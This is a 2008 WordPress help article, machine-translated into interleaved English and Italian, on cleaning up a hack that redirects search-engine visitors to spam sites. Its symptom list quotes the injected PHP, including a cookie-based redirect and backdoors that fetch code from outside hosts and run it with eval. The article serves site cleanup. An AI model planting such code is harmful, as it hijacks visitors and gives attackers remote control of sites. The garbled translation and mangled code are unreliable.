WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites Hack WordPress: Recupera e Fix Google e motore di ricerca o cookie n. traffico reindirizzato al tuo-Needs.info, AnyResults.Net, Golden-Info.net e altri siti illeciti

Hackers are going all out to hack and exploit WordPress blogs hosted all over the web, planting and injecting malicious code into WordPress codes and database in order to redirect visitors and hits from Google and other search engines to spam sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us and many other spam sites that filled with pay-per-click CPC ads. Hacker stanno andando tutti a incidere e sfruttare i blogs di WordPress ospitato in tutto il web, piantine e codice dannoso per via parenterale in WordPress database di codici e nella prospettiva di riorientare i visitatori e colpi di Google e altri motori di ricerca per lo spam siti come il vostro-needs.info , Anyresults.net, d'oro-info.net, keymachine.de, beliy.us, seogoogle.us e molti altri siti di spam che riempito con pay-per-click annunci CPC. Some hack appears to target bigger crowd by redirecting all without WordPress cookie. Alcuni hack sembra obiettivo più grande folla di riorientare tutti i cookie senza WordPress. Without been hacked, these traffic supposedly to arrive at the blog as destination. Senza stato violato, questi traffico presumibilmente per arrivare al blog come destinazione.

Symptoms of the Search Engine Redirection Hack Sintomi del motore di ricerca Reindirizzamento Hack

Note that not all symptoms may happen altogether. Nota che non tutti i sintomi del tutto può accadere. There may be more than one method of hacks existed, which contributed to different finding and possible resolution. Ci possono essere più di un metodo di hack esisteva, che ha contribuito a diversi e trovare risoluzione possibile.

• Any click through from search engines such as Google, Yahoo, AOL, MSN, Windows Live search results, including blog name, will be redirected and forwarded to hacker’s sites such as your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, with the list sure to grow. Fare clic su qualsiasi mezzo di motori di ricerca come Google, Yahoo, AOL, MSN, Windows Live risultati di ricerca, tra cui il nome del blog, verranno reindirizzati e trasmesso al hacker's siti come il vostro-needs.info, anyresults.net, d'oro-info . netto, keymachine.de, beliy.us, seogoogle.us, con l'elenco certo a crescere. Viewer arrives at the hacker page with the same search string that he or she used to search in search engine. Visualizzatore arriva alla pagina di hacker con la stessa stringa di ricerca che ha utilizzato per la ricerca nel motore di ricerca.
• Click on a link to the blog on RSS feed reader such as Google reader can be redirected to hacker site too. Fare clic su un link per il blog sul lettore di feed RSS come Google Reader può essere reindirizzato al sito di hacker.
• A visitor with no account on the blog, or not login (hence does not has cookie detected by malicious code), will be redirected to spam sites. Un visitatore senza alcun conto sul blog, o non login (e quindi non ha rilevato cookie di codice maligno), verrà reindirizzato a siti di spam.
• Only visits from search engine are been redirected away, and the trick manage to fool around probably a lot of bloggers, webmasters and site owners, or at least delay the detection of the problem. Solo visite da motore di ricerca sono stati reindirizzati via, e il trucco riesce a ingannare circa probabilmente un sacco di blogger, webmaster e proprietari del sito, o almeno ritardare l'individuazione del problema.
• Sudden huge and dramatic drop and lose of massive amount of visitors traffic and page views in web tracker statistics, especially traffic with Google as referrer, even though search engine results ranking is intact. Improvviso enorme e drammatica discesa e perdere di una massiccia quantità di visitatori e il traffico di pagine viste nel web tracker statistiche, in particolare del traffico con Google come referrer, anche se motore di ricerca di classificazione dei risultati è intatta.
• Massic drop of advertising revenue from Google AdSense or other ads network, or affiliate commissions. Massic goccia di entrate pubblicitarie di Google AdSense o altri annunci di rete, o affiliato commissioni.
• The following base64 encoded PHP code may appear on the wp-blog-header.php file: Le seguenti codificati base64 codice PHP può essere visualizzato sul wp-blog-header.php atto:

  <?php \ <? php \
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); seref $ = array ( "Google", "MSN", "vivere", "altavista", "chiedere", "yahoo", "AOL", "repubblica", "meteo", "Alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; } ser $ = 0; foreach ($ $ seref come rif) if (strpos (strtolower ($ _SERVER [ 'HTTP_REFERER']),$ rif)! == false) ($ ser = "1?; break;)
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?> if ($ ser == "1? & & sizeof ($ _COOKIE) == 0) (header (" Location: http:// ". base64_decode (" YW55cmVzdWx0cy5uZXQ =")."/"); uscita;)?>

• An image, which is in fact a bunch of malicious PHP code, was added to the wp-contents/uploads directory. Un'immagine, che in realtà è un po 'di codice PHP "maligno", è stato aggiunto al wp-contents/uploads la directory. For example, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, or it may be inside your theme folder, ie wp-contents/themes/classic/images/xyz.jpg. Per esempio, wp-contents/uploads/2008/06/06/abcdefghijklmn.jpg, o può essere dentro il tuo tema cartella, vale a dire wp-contents/themes/classic/images/xyz.jpg. The name of the image may be in the format of xxxxxx_old.jpeg. Il nome del l'immagine può essere nel formato di xxxxxx_old.jpeg.
• An entry was inserted in MySQL database for WordPress wp_options to activate the image (the malicious PHP code) as a plugin, typically as rss_f541b3abd05e7962fcab37737f40fad8. Una voce è stata inserita nel database MySQL per WordPress wp_options per attivare l'immagine (il "maligno" codice PHP) come un plugin, come tipicamente rss_f541b3abd05e7962fcab37737f40fad8.
• There may be also malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into other WordPress PHP files. Ci possono essere anche codici maligni, in particolare quelli che interpretati con eval () o base64_decode () comando state inserite in altre WordPress PHP file. Examples are the following codes: Esempi sono i seguenti codici:

  if(isset($_GET['p'])) { if (isset ($ _GET [ 'p'])) (
$sock = @fsockopen(’km20725.keymachine.de’, 80); $ sock = @ fsockopen ( 'km20725.keymachine.de', 80);
if($sock){ if ($ sock) (
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”); fwrite ($ sock, 'GET http://km20725.keymachine.de/server/index.php?host ='.$_ SERVER [' nome_server'].'& p ='.$_ GET [ 'p']. 'HTTP / 1,0 '. "\ R \ n");
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”); fwrite ($ sock, 'Host: km20725.keymachine.de'. "\ r \ n \ r \ n");
while($content[] = fgets ($sock)); while ($ contenuto [] = fgets ($ sock));
$content = implode(”, $content); $ content = implode ( ", $ contenuto);
@eval(trim(substr($content, strpos($content, “\r\n\r\n”)))); @ eval (trim (substr ($ contenuto, strpos ($ content, "\ r \ n \ r \ n "))));
fclose ($sock);} fclose ($ sock);)
} )

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'])); if (isset ($ _GET [ 'p'])) (eval @ (@ file_get_contents ( 'http://beliy.us/server/index.php?host ='.$_ SERVER [' nome_server'].'& p = '. $ _GET [' P']));
} )

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'])); if (isset ($ _GET [ 'p'])) (eval @ (@ file_get_contents ( 'http://seogoogle.us/server/index.php?host ='.$_ SERVER [' nome_server'].'& p = '. $ _GET [' P']));
} )

  eval(gzinflate(base64_decode( eval (gzinflate (base64_decode (

• WordPress theme that is been activated and used can be injected with hacking code and affected too. WordPress tema che è stato attivato e utilizzato può essere iniettato con codice di hacking e colpiti. Such code normally exists in header.php or index.php of the theme, and has a line similar to the below Tale codice normalmente esiste in header.php o index.php del tema, ed ha una linea simile a quello qui sotto

  if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: if ($ ser == "1" & & sizeof ($ _COOKIE) == 0) (header ( "Location:

The WordPress search traffic redirect to spam site hack happens probably due to security hole and vulnerability that is not patched when blog owner decides not to upgrade to latest version of WordPress (although some WordPress il traffico di ricerca reindirizzamento al sito di spam hack accade probabilmente a causa di buco di sicurezza e vulnerabilità che non è patchato proprietario del blog, quando decide di non eseguire l'aggiornamento alla versione più recente di WordPress (anche se alcuni reports relazioni that their blogs been hacked even though it’s already on the latest version of WordPress 2.5.1). che il loro blog stato violato anche se è già sulla versione più recente di WordPress 2.5.1). Whatever the cause, here’s the fix and solution to resolve and defeat the hack to ensure that you own back the traffic and avoid been penalized by Google by unreasonable redirecting to spam pages. Qualunque sia la causa, ecco la correzione e la soluzione per risolvere e di sconfiggere il trucco per accertarsi che il proprio ritorno di traffico e di evitare stato penalizzato da Google irragionevole di reindirizzamento verso pagine di spam.

1. Backup the WordPress database. WordPress il backup del database.
2. Use phpMyAdmin to browse WordPress MySQL database tables. PhpMyAdmin uso per navigare WordPress database MySQL tabelle. Go to wp_options table, and then edit the row named active_plugins . Vai alla tabella wp_options, quindi modificare la riga di nome active_plugins. The row details all active plugins that has been activated. La riga attiva tutti i dettagli plugin che è stato attivato. Go through the list (in a line), and look for an a plugin named ended with an image extension, such as .jpg, .jpeg, .gif and etc. For example, abcdefgh_old.jpeg. Passare attraverso la lista (in linea), e cercare un plugin uno di nome si è conclusa con una immagine di estensione, come. Jpg,. Jpeg,. Gif e ecc, ad esempio, abcdefgh_old.jpeg. Note down the path to the image file. Annotare il percorso del file di immagine.
3. Using sFTP or SSH (forget about FTP or Telnet for security), then navigate to the path of the file, and delete the file. SFTP o usando SSH (dimenticare FTP o Telnet per la sicurezza), poi navigare verso il percorso del file, e cancellare il file.
4. Go to WordPress Administrator Plugins panel, deactivate or activate any plugin to clear off the malicious plugin from the “active_plugins” row. Vai a WordPress Plugins pannello di amministrazione, attivare o disattivare qualsiasi plug in per cancellare il "maligno" plug dal "active_plugins" riga.
5. Back to phpMyAdmin , at the wp_options table, find a row that contains the following string as option_name : Torna alla phpMyAdmin, presso la tabella wp_options, trovare una riga che contiene la seguente stringa come option_name:

   rss_f541b3abd05e7962fcab37737f40fad8 rss_f541b3abd05e7962fcab37737f40fad8

   Delete the row away. Eliminare la riga di distanza.

   If you don’t know how to perform the database cleanup detailed in steps above, here’sa video tutorial: Se non si sa come eseguire la pulizia banca dati dettagliati nei passaggi di cui sopra, ecco un tutorial video:

6. Go to wp_users table. Vai a wp_users tabella. If there is a nameless user (null value in user_nicename field) created at 00:00:00 on 0000-00-00 , note down the user ID ( ID field, a number). Se c'è un nome utente (valore null nel campo user_nicename), istituito presso 00:00:00 a 0000-00-00, nota l'user ID (campo ID, un numero). Delete the user. Eliminare l'utente.
7. Browse the wp_usermeta table. Sfoglia il wp_usermeta tabella. Locate all rows with user_id matches the ID of the deleted illegal user. Individuare tutte le righe con le partite user_id l'ID del soppresso illegale utente. There are normally three rows been associated to the invader user ID. Vi sono normalmente tre righe stato associato a l'invasore ID utente. Delete all the associated rows. Eliminare tutti i file associati.
8. Login to the server to edit the theme files, or browse the theme files’ code in Theme Editor of WordPress Administrator Design panel. Login al server per modificare il file tema, o sfogliare il tema file 'codice in tema di WordPress Editore Design pannello di amministrazione. Check the header.php and index.php for any suspicious code. Controllare la header.php index.php e per ogni codice sospetto. As mentioned above, look for something similar to the line below: Come già detto, cercate qualcosa di simile a riga sottostante:

   if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: if ($ ser == "1" & & sizeof ($ _COOKIE) == 0) (header ( "Location:

   If found, delete and remove the code. Se trovati, cancellare e rimuovere il codice. Note that the malicious code will be several lines long in total. Si noti che il codice maligno saranno diverse linee a lungo in totale.

9. If it’s not already existed, create an empty index.html file in the wp-contents/plugins directory. Se non è già esisteva, creare un file index.html vuoto nel wp-contents/plugins directory. The blank index.html hides the contents of the plugins directory, effectively shield what plug-ins been used from hackers to harden and tighten the WordPress security. Il vuoto index.html nasconde il contenuto della directory dei plugin, in modo efficace scudo quali plug-in stato utilizzato da parte di hacker per indurire e serrare la sicurezza di WordPress.
10. Upload and replace each and every WordPress files (not only wp-blog-header.php) on the server with the fresh, clean, and original Carica e sostituire tutti i file di WordPress (non solo wp-blog-header.php) sul server con il fresco, pulito, e originale latest version from WordPress versione più recente da WordPress (of course, except few files such as wp-config.php and themes). (naturalmente, ad eccezione di alcuni file come wp-config.php e temi). If you’re upgrading, read the Se si esegue l'aggiornamento, leggere il guide guida carefully. attentamente.
11. Change your password. Cambia la tua password.
12. If you have multiple users, change theirs password (or ask them to change the password) too. Se si dispone di più utenti, cambiare la loro password (o chiedere loro di cambiare la password).

IMPORTANT : This is a machine translated page which is provided "as is" without warranty. IMPORTANTE: Questa è una pagina tradotta macchina che è fornito "così com'è" senza alcuna garanzia. Machine translation may be difficult to understand. Traduzione automatica può essere difficile da capire. Please refer to Si prega di fare riferimento a original English article articolo originale in lingua inglese whenever possible. quando possibile.

Share and contribute or get technical support and help at Condividere e contribuire o ottenere supporto tecnico e assistenza in My Digital Life Forums La mia vita digitale Forum .

Related Articles Articoli correlati

• Add NoFollow Relationship to WordPress Blogroll to Increase PageRank Aggiungi nofollow rapporto con WordPress blogroll di aumentare PageRank
• WordPress Plugin: Display Google Analytics and FeedBurner Reports Statistics from Site Admin Wordpress plugin: visualizzazione di Google Analytics e FeedBurner relazioni statistiche del sito da admin
• Technorati Incoming Links Plugin for WordPress Technorati link in entrata plugin per WordPress
• A Glance At Google Merchant Search Uno sguardo al commerciante di ricerca di Google
• How to Avoid, Bypass or Escape Google Sandbox Come evitare, o Bypass Escape Google Sandbox
• Ask.com Search Engine Review by CNNMoney Ask.com motore di ricerca di riesame da CNNMoney
• Drive More Traffic by Using Images Una maggiore quantità di traffico utilizzando immagini
• SEO Friendly Rewrite Method to Move Website URL From Subdirectory to Root Parent Folder SEO friendly riscrivere metodo per spostare l'URL del sito Web da sottodirectory a root cartella
• Integrate and Display Google AdSense for Search and Co-Op Custom Search Engine Results in WordPress Blog Page Template Integrare e visualizzazione di Google AdSense per la ricerca e Co-op motore di ricerca personalizzato di risultati in wordpress blog modello di pagina
• Which Search Engine is the Best and Most Relevant? Motore di ricerca che è il migliore e più pertinente?

This entry was posted on Tuesday, June 10th, 2008 at 1:03 am and is filed under Questa voce è stato postato su Martedì, 10 giugno 2008, 1:03 am ed è archiviato sotto Weblogs Weblog . . You can follow any responses to this entry through the È possibile seguire tutte le risposte a questa entrata attraverso la RSS 2.0 RSS 2,0 feed. alimentare. You can Potete leave a response lasciare una risposta , or , O trackback trackback from your own site. dal tuo sito.